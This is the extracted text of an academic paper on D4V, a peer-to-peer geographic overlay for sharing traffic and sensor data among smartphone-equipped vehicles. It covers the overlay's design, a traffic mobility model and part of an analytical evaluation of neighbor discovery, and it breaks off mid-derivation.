6 May 2015 Accepted 19 July 2015 Published 19 August 2015 Corresponding author Michele Amoretti, michele.amoretti@unipr.it Academic editor Xiaodong Wang Additional Information and Declarations can be found on page 28 DOI 10.7717/peerj-cs.15 Copyright 2015 Picone et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS D4V: a peer-to-peer architecture for data dissemination in smartphone-based vehicular applications Marco Picone, Michele Amoretti, Gianluigi Ferrari and Francesco Zanichelli Department of Information Engineering, Università degli Studi di Parma, Italy ABSTRACT Vehicular data collection applications are emerging as an appealing technology to monitor urban areas, where a high concentration of connected vehicles with onboard sensors is a near future scenario. In this context, smartphones are, on one side, effective enablers of Vehicle-to-Vehicle (V2V) and Vehicle-to-Infrastructure (V2I) applications and, on the other side, highly sophisticated sensing platforms. In this paper, we introduce an effective and efficient system, denoted as D4V, to disseminate vehicle-related information and sensed data using smartphones as V2I devices. D4V relies on a Peer-to-Peer (P2P) overlay scheme, denoted as Distributed Geographic Table (DGT), which unifies the concepts of physical and virtual neighborhoods in a scalable and robust infrastructure for application-level services. First, we investigate the discovery procedure of the DGT overlay network, through analytical and simulation results. Then, we present and discuss an extensive simulation-based performance evaluation (considering relevant performance indicators) of the D4V system, in a 4G wireless communication scenario. The simulation methodology combines DEUS (an application-level simulation tool for the study of large-scale systems) with ns-3 (a well-known network simulator, which takes into account lower layers), in order to provide a D4V proof-of-concept. The observed results show that D4V-based information sharing among vehicles allows to significantly reduce risks and nuisances (e.g., due to road defects and congestions). Subjects Computer Networks and Communications, Distributed and Parallel Computing, Mobile and Ubiquitous Computing Keywords Vehicular Sensor Networks (VSNs), Smartphones, Peer-to-Peer (P2P), Vehicle-to-Infrastructure (V2I), Localization INTRODUCTION Driving safely, efficiently, and comfortably depends certainly on the vehicle status and on the driver behavior. However, a large number of external factors (e.g., traffic congestions, road defects, etc.) have a relevant impact and are difficult to predict without the support of ICT technologies. Among others, vehicular inter-networking has a prominent role (Hartenstein & Laberteaux, 2009), paving the way to several valuable applications, such as geocasting, mobile data sensing and storage, street-level traffic flow estimation, and others (Lee & Gerla, 2010). Vehicular inter-networking builds upon How to cite this article Picone et al. (2015), D4V: a peer-to-peer architecture for data dissemination in smartphone-based vehicular applications. PeerJ Comput. Sci. 1:e15; DOI 10.7717/peerj-cs.15 mailto:michele.amoretti@unipr.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.15 http://dx.doi.org/10.7717/peerj-cs.15 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Vehicle-to-Vehicle (V2V) and Vehicle-to-Infrastructure (V2I) communications, as well as on hybrid variants (Hartenstein & Laberteaux, 2009). Recently, the Vehicular Sensor Network (VSN) research community has started investigating the possibility of using smartphones as V2V and V2I communication nodes, but also as portable sensing platforms (Gerla & Kleinrock, 2011). Smartphones are characterized by an ever improving technology—in terms of computational, networking, and storage capabilities—and good (practically ubiquitous) connectivity. Users often carry such powerful handheld devices in their cars, to take advantage of multimedia playback, navigation assistance, as well as Internet connectivity. Thus, in the near future, many vehicles may be exploited as mobile sensors to gather, process, and transmit data harvested along the roads in urban and extra-urban environments, potentially encompassing multi- ple types of information ranging from traffic/road conditions to pollution data and others. As a matter of fact, until support for ad-hoc WiFi connectivity or for the new Wi-Fi- Direct standard (Wi-Fi Alliance) will be widespread, smartphone-based VSNs will require the presence of a communication infrastructure (e.g., 3G/4G cellular networks, WiMAX). Therefore, they will share the advantages of V2I schemes over V2V technologies, namely a better support in Commercial Off-The-Shelf (COTS) equipment, native long-range communication capabilities as well as support for broadcast or multicast communications (to the application level, at least). At the same time, cellular-network VSNs exhibit some disadvantages with respect to V2V schemes, such as: higher latency at short distances; local communication obtained only indirectly and by adding overhead; the need for service coverage; and the associated data traffic costs. While hybrid communication schemes, i.e., combining V2V with V2I capabilities, would inherently provide the most effective and robust solution, we remark that purely infrastructure-based communication does not limit the application level of data dissemination and processing to a specific centralized architecture. In fact, a V2I infras- tructure does not necessarily imply a centralized organization, which would inevitably lead to scalability issues—for example, to cope with the information requirements of thousands or millions of vehicles moving around in a large metropolitan area. While multiple distributed (e.g., hierarchical) subsystems can be deployed to achieve better scalability, a completely decentralized Peer-to-Peer (P2P) approach is more appealing. Initially exploited within V2V schemes (Mahmoud & Olariu, 2007), P2P approaches have been recently adopted also to implement decentralized Traffic Information Systems (TISs) (Santa, Moragon & Gomez-Skarmeta, 2008). In fact, P2P strategies allow respon- sibility decentralization, as well as computational and communication load balancing, which can be beneficial for smartphone-based VSNs (Rybicki et al., 2007). In the context of P2P TISs, in this paper we introduce the D4V architecture, based on opportunistic mechanisms for the dissemination of data generated by vehicle sensors and drivers. D4V requires no dedicated hardware and leverages upon COTS and worldwide available devices (such as smartphones), rather than dedicated devices. Smartphones are usually affected by high energy consumption when using networks and GPS. However, this is not a real issue for vehicular applications, since smartphones will typically be connected Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 2/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 to an in-vehicle power source while using D4V. To the best of our knowledge, D4V is the only TIS providing, at the same time, massive scalability (because of its P2P nature), deployability (because of the light hardware requirements), and message configurability. With respect to the state of the art, D4V has a higher coverage percentage—the ratio between the number of peers that actually receive a specific message and the total number of those which should receive it—with less bandwidth requirements. D4V is based on a P2P overlay scheme denoted as Distributed Geographical Table (DGT) (Picone, Amoretti & Zanichelli, 2011a; Picone, Amoretti & Zanichelli, 2011b)—indeed, D4V stands for DGT for VSNs. The DGT overlay scheme represents a scalable and robust infrastructure for application-level services, and relies on the unification of the concepts of geographical and virtual neighborhoods (Picone, Amoretti & Zanichelli, 2011a). The DGT assumes that each peer knows its Global Position (GP)—which is reasonable, as nowadays every mobile device is equipped with a Global Positioning System (GPS). The main contributions of this paper can be summarized as follows: 1. the introduction of the D4V system, with its opportunistic dissemination strategy for vehicular information and sensed data; 2. a sound analytical framework for performance evaluation of the DGT-based proactive neighbor localization protocol embedded in D4V; the DGT is introduced and partially analyzed in Picone, Amoretti & Zanichelli (2011a), Picone, Amoretti & Zanichelli (2011b); 3. the performance evaluation of the D4V, by means of multi-layer discrete event simulations, using realistic vehicle motion patterns and taking into account dangerous road stretches and traffic jams. In particular, we apply a recently proposed methodol- ogy (Amoretti et al., 2013) to integrate DEUS, an application-level simulation tool for the study of large-scale systems (Amoretti, Agosti & Zanichelli, 2009), with ns-3, a widely used simulation tool which takes into account lower layers (ns-3 Development Team). The paper is organized as follows. Section ‘Related Work’ provides a summary of the state of the art about VSNs. Section ‘Distributed Geographic Table’ recalls the main DGT concepts. Section ‘D4V System’ illustrates the principles of the D4V system for traffic and sensed data dissemination. Section ‘Mobility Model’ illustrates the main aspects of the mobility model used to characterize realistic vehicular scenarios. In Sectiion ‘Performance Evaluation’, the results of the performance analysis of the proposed D4V system are presented: section ‘DGT-based Proactive Localization’ is dedicated to the analytical and simulation-based performance analysis of the DGT-based discovery protocol embedded in D4V; section ‘D4V Performance Evaluation’ analyzes the performance of D4V (both its DGT sublayer and its opportunistic dissemination strategy). Finally, section ‘Conclusions’ concludes the paper. RELATED WORK Several data dissemination strategies for VSNs have been proposed in the literature (Lee & Gerla, 2010). A fundamental issue is connectivity: different wireless access and communi- cation methods have been evaluated, including Dedicated Short-Range Communication Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 3/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 (DSRC) (Jiang et al., 2006), WiMax/802.16e (Han et al., 2008), WLAN (Hadaller et al., 2007), as well as cellular systems (Qureshi, Carlisle & Guttag, 2006). The use of a cellular communication network reduces the problem of implementing a working TIS, but introduces, on the other hand, the issue of collecting and distributing data to interested users. In the following, we discuss some relevant research works related to VSNs, distinguishing between V2V and V2I approaches. V2V approaches Most V2V architectures rely on in-network aggregation mechanisms to improve communication efficiency by summarizing information that is exchanged between vehicles (Dietzel et al., 2014). For example, in one of the earliest works in V2V communications, Lee et al. (2006) proposed MobEyes, a strategy for harvesting, aggregating, and distributing sensed data by means of proactive urban monitoring services provided by vehicles which continuously discover, maintain, and process information about events in an urban scenario. Messages and summaries are routed to vehicles in the proximity, to achieve common goals, such as providing police cars with the trajectories of specific target cars. Later, Meneguette et al. (2014) proposed a network partition-aware geographical data dissemination protocol, which eliminates the broadcast storm and maximizes the data dissemination capability across network partitions with short delays and low overhead, at the expense of a high number of message transmitted. The same issue affects DOVE, proposed by Yan, Zhang & Wang (2014). V2V communication technology could mitigate traffic collisions and improve traffic congestion by exchanging basic safety information such as location, speed, and direction between vehicles within range of each other. Recently, Xiang et al. (2015) modeled vehicles’ data preferences and explored the feasibility and benefits of incorporating these preferences into the design of safety data dissemination protocols. Furthermore, they designed PVCast, which assigns a higher transmission priority to packets that can satisfy a higher total data preferences of vehicles in the network by broadcasting. As a result, the differentiated transmission priorities of packets reduce contention and collision. Another important aspect is the relationship between data dissemination performance and traffic congestion. Du & Dao (2015) recently developed analytical formulations to estimate information propagation time delay via a V2V communication network formed on a one-way or two-way road segment with multiple lanes. The proposed study carefully involves several critical communication and traffic flow features in reality, such as wireless communication interference, intermittent information transmission, and dynamic traffic flow. Moreover, this study elaborately analyzes the interactions between information and traffic flow under sparse and congested traffic flow conditions. V2I approaches Cellular networks are used in participatory VSN platforms, enabling applications such as ride quality monitoring, street-level traffic flow estimation, and proactive urban Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 4/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 surveillance (Hull et al., 2006; Burke et al., 2006; Mohan, Padmanabhan & Ramjee, 2008; Mun et al., 2009). Initially, most participatory VSN platforms were based on the client/server paradigm, where all data generated by vehicles are stored in a central server (or server farm). Hull et al. (2006) pointed out that the major technical challenges of such a solution are mostly related with the huge amount of simultaneous updates and queries generated by user moves and requests (each car is a source of queries and regularly sends its own measurements). For these reasons, researchers started investigating architectures based on the P2P paradigm, to build a distributed TIS where cars are not only consumers but also producers of information. Rybicki et al. (2007) with Peers on Wheels and, more recently, with PeerTIS (Jedrzej et al., 2009), proposed V2I architectures where participating cars are peers organized in a Distributed Hash Table (DHT). Roads are divided into road segments, each with a unique ID that is used as key in the DHT. The main idea is that each peer is responsible for a certain part of the ID space and, consequently, for a certain number of road segments. Up to now, one of the troubling issues is the fact that obtaining full information about planned and alternative routes is expensive in terms of bandwidth consumption. Santa, Moragon & Gomez-Skarmeta (2008) presented another P2P approach based on cellular networks and on the JXTA middleware (Sun Microsystems, Inc, 2005), to enable the transmission of information among vehicles and between vehicles and infrastructure, bounding the propagation of messages with respect to time and space (Santa, Moragon & Gomez-Skarmeta, 2008). A more recent location-aware P2P overlay scheme for smart traffic applications is Overdrive, developed by Heep et al. (2013). Overdrive builds a geographical neighborhood for each peer, taking into account not only peers’ positions, but also their speeds and directions. Traffic information is then disseminated by means of efficient flooding mechanisms. DISTRIBUTED GEOGRAPHIC TABLE A structured decentralized P2P overlay is characterized by a controlled overlay, shaped in a way that resources (or resource descriptors) are placed at appropriate locations (Amoretti, 2009). Moreover, a globally consistent protocol ensures that any peer can efficiently route a search to the peers that have the desired resource, even if the resource is extremely rare. Beyond basic routing correctness, two important topology constraints guarantee that (i) the maximum number of hops in any route (route length) is small, so that requests are fulfilled quickly, and (ii) the maximum number of neighbors of any peer (maximum node degree) is small, so that maintenance overhead is not excessive. The DGT is a structured overlay scheme where each participant can efficiently retrieve information located near any chosen geographic position (Picone, Amoretti & Zanichelli, 2011a). In such a system, the responsibility for maintaining information about the position of active peers is distributed, for which a change in the set of participants causes minimal disruption. In the following, we recall the main DGT concepts using the P2P system notation introduced by Aberer et al. (2005). Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 5/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 In a generic DGT overlay, the set of peers is called P , each peer being characterized by a unique identifier id ∈ I (where I is the space of identifiers). The space of world’s coordinates is denoted as W and w ∈ W , w = ⟨latitude,longitude⟩ is a generic position. Thus, a peer p ∈ P may be identified by the pair ⟨idp,wp⟩, where idp ∈ I and wp ∈ W . The distance d between two peers is defined as the actual geographic distance between their locations in the real world (also known as great-circle distance or orthodromic distance (Longley et al., 2005)). The neighborhood of a geographic location is the group of peers located inside a given region surrounding that location. The main service provided by the DGT overlay is request routing, allowing to find available peers in a specific region, i.e., to determine the neighborhood of a generic global position w ∈ W . Routing is a distributed process implemented as asynchronous message passing. By executing the route (p,w,a) operation, a peer forwards to another peer p ∈ P a request for the list of peers that peer p knows to be located in the region a ∈ A, whose center is w ∈ W . Thus, a routing strategy can be described as the following (possibly non-deterministic) function: N : P × W × A → 2P (1) which returns the neighborhood N (p,w,a), around the geographic position w and within region a, known by peer p. The routing process is based on the evaluation of the region of interest centered in the target position. The idea is that each peer involved in the routing process selects, among its known neighbors, those that are likely to know a large number of peers located inside or close to the chosen region centered at the target point. If a contacted peer cannot find a match for the request, it does return the list of closest peers, taken from its routing table. This procedure can be used both to maintain the peer’s local neighborhood N and to find available peers close to a generic target. Regarding the local neighborhood, the general aim of the proposed approach is to provide accurate knowledge of peers that are close to the requesting one (starting from a set of neighbors provided by a bootstrap node, during the overlay network joining phase), together with a reduced set of remote peer references which will be used to forward long range geographic queries.1 Whenever a single active peer in the system wants to contact 1 Such an idea recalls Granovetter’s theory of weak ties (Granovetter, 1973), stating that human society is formed by small complete graphs whose nodes are strongly connected (friends, colleagues, etc.). Such clusters are weakly connected between each other, e.g., a member of a group superficially knows a member of another group. The most important fact is that weak ties are those which make human society an egalitarian small world network, i.e., a giant cluster with small separation degree and no hubs (Buchanan, 2003). other peers in its region (e.g., to provide or search for a service), it does not need to route additional and specific discovery messages to its neighbors (or to a supernode responsible for a specific zone) in order to find peers that are geographically close. Instead, it simply reads its neighbors’ list, which is proactively filled with geographic neighbors. Our peer neighborhood construction strategy has been inspired by Kademlia (Maymounkov & Mazieres, 2002), which is used, for example, in recent versions of the eMule client, as an alternative to the traditional eDonkey protocol (eMule project). Many of Kademlia’s benefits result from its use of the XOR metrics to compute the distance between points in the resource identifier space. XOR is symmetric, allowing Kademlia participants to receive lookup queries from precisely the same distribution of peers contained in their routing tables, which are organized as sets of k-buckets. Every k-bucket is a list having Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 6/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 up to k entries: in other words, each peer in the network has lists containing up to k peers, each list being associated with a given distance from the peer itself. In order to locate peers near a particular identifier, Kademlia uses a single routing algorithm from the beginning till the end. Peer neighborhood construction in DGT uses the geographic metric, instead of Kademlia’s XOR metric. Each peer knows its GP, retrieved with a GPS or with other localization technologies (e.g., GSM cell-based localization), and knows a set of real neighbors organized in a specific structure, based on the distances of these neighbors from the peer’s GP. The overlay network construction is based on the process described in the following. Every peer maintains a set of Geo-Buckets (GBs), each one being a (regularly updated) list of known peers, sorted by their distances from the GP of the peer itself. GBs can be represented as K concentric circles, with increasing (application-specific) radii {Ri} K i=1 and thicknesses {ri} K i=1, with Ri = i j=1 rj. If there is a known peer whose distance is larger than the radius of the outmost circle RK , it is inserted in another list which contains the peers located outside the region covered by the circle model. Each peer in the GB set is characterized by (i) an Identifier (ID) which uniquely identifies the peer within the DGT; (ii) a GP, with latitude and longitude values retrieved by means of a GPS receiver or other positioning systems; (iii) a Contact Address allowing the identification of the peer in the Internet; (iv) and a number of known peers used to compare two peers which have the same distance. Moreover, each peer maintains a set of message types which it is interested on. When a new peer wants to join the network, it sends a join request, together with its GP, to a bootstrap node, which returns a list of references to peers that are geographically close to the peer itself. It is important to emphasize that this information is not updated: referenced peers may have moved away from their initial locations. It is up to the joining peer to check for the actual availability of listed peers. Such an operation is performed when the peer first joins, but also when the peer finds itself to be almost or completely isolated. In these situations (that typically arise when peers enter low density regions), the peer may send a new join request to the bootstrap node, in order to obtain a list of recently connected peers which may become neighbors. The main procedure used during peer discovery is FIND NODES(GP), which returns the β peers that are nearest to the specified GP. Peer p keeps its neighborhood awareness up-to-date by periodically applying FIND NODES to its own global position GPp. Such a procedure (with any target GP) may also be executed upon request from another peer. Peer p searches in the GB related to the requested GP. The final objective of the peer lookup process is to find the α ≤ K peers that are nearest to the selected GP, including newly connected peers, as well as mobile peers that have entered the visibility zone. The lookup initiator starts by picking α peers from its closest non-empty GB—or, if that bucket has less than α entries, it just takes the α closest peers, by extending the lookup to all its GBs. Such a peer set is denoted as C (0)i = {p (0) i (1),...,p (0) i (α)} K i=1. The initiator sends parallel FIND NODES requests, using its GP as target, to the α peers in C (0)i . Each interrogated peer replies indicating β references. The initiator sorts the result list Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 7/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 according to the distance from the target position, then picks up α peers that it has not yet queried and re-sends the FIND NODES request (with the same target) to them. If a round of FIND NODES fails to return a peer closer than the closest one already known, the initiator re-sends the FIND NODES to the K closest peers not already queried. The lookup terminates when the initiator has obtained responses from the K closest peers, or after f cycles, each jth cycle generating an updated set C (j)i of nearest neighbors. Thus, the number of sent FIND NODES(GP) messages is f · α + K and depends on the peer spatial density in the region of interest. A peer is allowed to run a new lookup procedure only if the previous one is completed, in order to reduce the number of exchanged messages and to avoid the overlapping of the same type of operations. The general idea is that soon after the bootstrap or when neighbor peers are highly dynamic, the discovery process period may be very short and may increase when the knowledge among active peers becomes sufficiently stable. Any active peer in the network can change its geographic position for many reasons (e.g., the user may be walking, driving, etc.). In order to preserve the consistency of the DGT, each peer has to periodically schedule a maintenance procedure which compensates the network topological changes. The practical usability of a DGT critically depends on the messaging and computational overhead introduced by such a maintenance procedure, whose features and frequency of execution are application-dependent. When an active peer in the network changes its geographic position, it has to send updates of its GP to its neighbors, in order to make their knowledge more accurate. To avoid excessive bandwidth consumption, every peer communicates its position update to neighbors only if the displacement (with respect to the last communicated position) is higher than ϵ (dimension: (km)). If a peer receives a neighbor’s update indicating that the new position of the latter is out of its region of interest, the neighbor’s reference is removed from the appropriate GB and a REMOVE message is sent to the peer. The DGT allows peers to have accurate knowledge of geographically close neighbors and a limited view of the outer world. However, whenever necessary and with limited incremental computational and transmission costs, a peer can find new peers which are entering the target region. The described P2P localization scheme represents the core layer of the proposed D4V system, which can discover and inform drivers who may be interested in specific traffic messages or data acquired by vehicle sensors. D4V SYSTEM Most vehicular network safety applications need information from a very limited geographic region around the vehicle’s current position. This may not be the case for driving comfort applications, such as traffic intensity or traffic jam monitoring, as well as parking discovery (Caliskan, Graupner & Mauve, 2006) or guidance systems, which distribute information about the traffic status of the entire city or of those regions where the car is located or moving to. The goal of the D4V system, based on the DGT overlay scheme recalled in Section ‘Distributed Geographic Table’, is to provide a reliable and scalable solution for Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 8/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 1 D4V and DGT layers. disseminating—in an opportunistic way—information coming from driver’s inputs or vehicle sensors, such as, for example, active shock absorber, cameras, engine, and temperature sensors. In Fig. 1, an illustrative representation of the D4V system, built on top of DGT, is shown. Generally speaking, distributing information over long ranges in vehicular applications is a very challenging task in terms of how to gather, transport, and aggregate such information. The reference scenario of this paper is related to the case where the vehicular network and the user are interfaced uniquely through a mobile device. The information that enriches the knowledge base of the car is collected from internal and external data sources, namely vehicle or roadside infrastructure sensors. The on-board intelligence of the car extends, maintains, and disseminates such an information by creating a local view of the car surroundings. In the literature, different techniques for content dissemination in VSNs are described, such as flooding and geocasting (Tonguz et al., 2007; Bronsted & Kristensen, 2006), request/reply (Zhao & Cao, 2007; Wegener et al., 2007), broadcasting, sharing (Seskar et al., 1992), and beaconing (Xu & Barth, 2006; Fujiki et al., 2007). In the D4V system, we combine the DGT scheme with the opportunistic and spatiotemporal dissemination ap- proach proposed by Leontiadis & Mascolo (2007), which is based on the publish/subscribe paradigm and allows message distribution to all interested receivers in a given region, by keeping messages alive in that region for a specific period of time. Owing to its properties, we believe that such an integrated solution fits well with a very dynamic scenario, where users can easily and frequently change their subscription interests according to their planned paths, the current season, their city neighborhood, and other parameters. Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 9/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 The basic D4V message is composed by: a type, for the notification category (for example, the class of traffic events or sensor data); a location, associated with the information; an Event Range (ER), which represents the region that the notification should reach; an expiration time of the event; and a message payload containing—whenever necessary—additional and detailed information about the event. Different types of messages can thus be distributed by means of the same dissemination protocol. It is possible to create, for example, a message to warn approaching users about a traffic queue or a dangerous situation, to distribute data extracted from the different sensors of the vehicle or to notify other users about a free space in a parking area. Each user selects the list of message types he/she is interested on, and adds it to his/her peer descriptor, thus allowing other peers to send only appropriate messages, according to the receiver’s preferences. When a new message is generated, the publisher picks up from its GBs the closest known peers of the DGT overlay, within the Event Range, that are interested in the particular information type (by reading the peer descriptor) and sends them the new message. Such an optimization can be obtained at the expense of a small overhead, due to the inclusion in the message of the list of previous recipients. When a notification is received, D4V checks if it matches the user interests or not (in the presence of dynamic subscription) or if it is already known. In the case of a new information, the peer adds it to its knowledge base, and distributes it again to known interested peers. When a peer receives the references about a new peer in its region of interest, it checks if in its knowledge base there are notifications not yet expired that may be useful for that new peer. If the latter needs such an information (an hash-based comparison is performed), the peer provides it. During such a dissemination process, it is necessary to check if some messages have expired, and, consequently, to remove them and their references from the peer’s knowledge base, thus avoiding the distribution of obsolete notifications. MOBILITY MODEL The mobility model is one of the fundamental elements for realistic performance evaluation of simulated V2V and V2I networking applications. In our work, we take into account some ideas proposed by Harri, Filali & Bonnet (2005) and Fiore et al. (2009), about the key features that should be included in a vehicular mobility simulator, in order to obtain realistic motion patterns. Moreover, our model partially follows the approach of Zhou, Xu & Gerla (2004), where the key idea is to use Switch Stations (SSs), connected via virtual tracks, to model the dynamics of vehicle and group mobility. For example, our simulative analysis considers a square area around the city of Parma (Italy), with 20 SSs inside and outside the city district: a Google Maps based representation of Parma is shown in Fig. 2. Stations are connected to each other through virtual paths, which have one lane for every direction, speed limitations associated with the street category, and a specific road density limit to model vehicles’ speeds in traffic jam conditions. When a new car joins the network, it first associates with a random SS; then, it selects a new SS and starts moving along the connection path between the two SSs. Such a procedure is repeated every time the car reaches a new SS and has to decide its next destination. Each SS has Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 10/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 2 Example of simulated DGT-based VSN (in the city of Parma, Italy). an attraction/repulsion value which influences the user’s choice for the next destination station. This value may be the same for each path in order to allow a random trip selection. A set of parameters is associated with each car, thus affecting macroscopic and microscopic aspects of traffic circulation, like street and highway limitations (i.e., some types of vehicles are forbidden on particular paths), as well as acceleration, deceleration, and speed constraints. We model different external events which may happen during the traffic simulation and alter drivers’ behavior, such as: accidents, temporary road works, or bad road surface conditions due to ice, snow or potholes. We assume that these events can be detected by vehicle sensors. Drivers do not only interact with obstacles, but also adapt their behaviors according to their knowledge about surroundings. For example, they may try to change their paths if they are informed about a traffic jam or an accident slowing or blocking, and they reduce their speed in proximity of locations characterized by bad surface conditions. We consider a microscopic flow model, where mobility parameters of a specific car are described with respect to other cars. Several approaches take into account, for example, the presence of nearby vehicles when modeling vehicle speed (e.g., Fluid Traffic Model (FTM) (Seskar et al., 1992; Krauss, Wagner & Gawron, 1997), and Intelligent Driver Model (IDM) Trieber, Hennecke & Helbing, 2000)). In particular, FTM is the most accurate for our scenario, with different speed limits for different virtual paths and low computational Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 11/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 requirements. In FTM, vehicle speed is a monotonically decreasing function of the vehicular spatial density, forcing lower values when the traffic congestion reaches a critical point. In our case, the desired speed of a vehicle moving along the points of the ith path is computed according to the following equation: vdes = max  vmin,v (i) max  1 − k kjam  (2) where: vmin is the minimum vehicle speed and depends on the vehicle’s characteristics (dimension: (km/h)); v (i) max is the speed limit of the ith path (dimension: (km/h)); k is the current vehicular spatial density of the road (dimension: [vehicles/km]), given by n/l (n represents the number of vehicles on the road and l is its length in km), and kjam is the vehicular spatial density (dimension: (vehicles/km)) in correspondence to which a traffic jam is detected. As mentioned before, we also want to model the behavior of a driver in proximity of a road point with bad surface conditions. The idea is that a conscientious driver, knowing that along his/her road there is a potential dangerous location, reduces the car speed according to the distance from that point. The safe speed vsafe is defined by the following equations: vsafe = d2 k1 + k2 (3) k1 = d2limit vdes − vmin (4) k2 = vmin (5) where: d is the distance between the vehicle and path location with bad surface conditions (dimension: (km)); dlimit is the limiting distance (dimension: (km)) from which the evaluation of safe speed starts; k1 (dimension: (h)) and k2 (dimension: (km/h)) depend on the desired speed vdes (dimension: (km/h)) at the limiting distance and on the minimum speed vmin (dimension: (km/h)) near the dangerous location. PERFORMANCE EVALUATION We first present an analytical performance evaluation framework of the DGT-based proactive neighbor localization protocol illustrated in Section ‘Distributed Geographic Table’. The analytical results are confirmed by simulations, showing that the proposed framework is an effective and efficient approach to evaluate the number of discovery steps for highly precise (D4V-instrumental) neighbor localization. We then investigate, through simulations, a D4V-based application which allows vehicles to adapt their routes according to traffic information gathered from other vehicles in the area. DGT-based proactive localization Assuming that N peers are distributed within a square surface with side of length L (dimension: (km)), the corresponding peer spatial density, denoted as ρ, is N/L2 Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 12/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 (dimension: (vehicles/km2)). If peers are static and uniformly distributed over the square surface, ρ is also the local peer spatial density. In the presence of node mobility (but still under the assumption that there are N peers in the square region of interest), the peer distribution is likely to be non-uniform: the corresponding peer spatial density can be heuristically estimated as γ N/L2, where γ ∈ R+ is a compensation factor to take into account the fact that peers could be locally denser (γ > 1) or sparser (γ < 1) than the average value ρ. Assume that, at a specific time, a peer wants to identify the available geographic neighbors within a circular region of interest. Such a region, centered at the peer, is denoted as R and its area is A. In general, within the region of interest of a peer there are two classes of neighbors: detectable (i.e., peers which can be detected by one or more other peers) and non-detectable (i.e., peers which cannot be detected by any other peer). Assuming that peers are distributed according to a two-dimensional Poisson distribu- tion2 with parameter ρ, the average number of peers in the region R is N(R)tot = ρ · A. Let us 2 This is an approximation. In fact, owing to node mobility, the local distribution is likely to be non-Poisson. However, as we will consider only average values, the Poisson approximation will be shown to be accurate. denote by x ∈ (0,1) the percentage of non-detectable peers in the region R (i.e., there are, on average, x · N (R) tot non-detectable peers). Assuming further that the number of detectable peers in R has a Poisson distribution with parameter ρ · A · (1 − x), it follows that their average value is N (R) D = ρ · A · (1 − x). As described in Section ‘Distributed Geographic Table’, during each step of the discovery procedure, a peer picks the closest α known neighbors (if available) and sends them simultaneous FIND NODES requests centered in the peer’s geographic location. The goal of the interrogating peer is to retrieve detectable peers in its region of interest. If, at the end of an iteration, no new peer is retrieved, the discovery process ends and will be rescheduled according to a specific strategy. In order to evaluate the number of discovered peers at each discovery iteration (without counting the same peer more than once), the α FIND NODES requests, scheduled at each discovery step, must be taken into account considering not only the intersections between pairs of peers, but also the possible intersections between η-tuples (2 ≤ η ≤ α) of peers originating from the α contacted peers. The total number of such intersections is α i=1  α i  = 2α − 1. (6) In Fig. 3, an illustrative scenario with α = 3 overlapping circular regions (associated to 3 contacted peers) is shown. Since the intersection of α circular regions can be highly varying (depending on their relative positions), we simplify the analysis assuming that adjacent contacted peers are spaced by an angle 2π/α and are positioned in the center of the corresponding radius of the circular region of interest of the analyzed peer that is performing discovery requests. We denote as Aj the sum of the areas of the intersection region shared only by the requesting peer and j contacted peers. In Fig. 3, the areas {A1,A2,A3} are indicated. Such areas can be computed using the Matlab library available at (Vakulenko). Explicit expressions Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 13/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 3 Intersection regions between 3 overlapping circular area of interest. (not shown here for the sake of conciseness) can be derived according to the analysis in Fewell (2006). Under the above assumptions, the average number of new peers discovered after s steps can be written as n(s) =   l0 s = 1 n(s − 1) + α j=1 dj (n(s − 1)) s > 1 (7) where: l0 is the initial size of the peer list; n(1) is the average number of initial peers (trans- ferred to the peer of interest); n(s − 1) is the number of new peers discovered up to the (s − 1)th step (s ≥ 2); dj (n(s − 1)) represents the average number of new peers discovered in the region of area Aj upon querying n(s − 1) peers and can be expressed as follows: dj (n(s − 1)) = ρ · Aj · (1 − x) · bj (n(s − 1)) (8) where bj (n(s − 1)) is the probability that no replicas are obtained in the jth intersection between the applicant’s region of interest and the regions of interest of the n(s − 1) queried Picone et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.15 14/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.15 Figure 4 PMN as a function of the discovery step, considering (A) 500 active peers and (B) 1,000 active peers. peers. This probability depends on: (i) the number of peers that share the same zone (i.e., j) and can answer with the same peer references; and (ii) the average number n(s − 1) of known peers at step s − 1—in fact, the number of known peers at each step needs to be taken into account to evaluate potential replicas. Considering the fact that if a peer knows its neighbors, the probability of discovering an already known peer is higher, the following heuristic expression for bj will be shown to allow to derive accurate performance results: bj (n(s − 1)) =  1 − n(s − 1) N (R) D j . (9) Since j is the number of peers that share the same zone, in (9), by using j as exponent of the probability of receiving replicas, the higher is j, the lower is bj. Finally, the average number of newly discovered peers up to step s can be 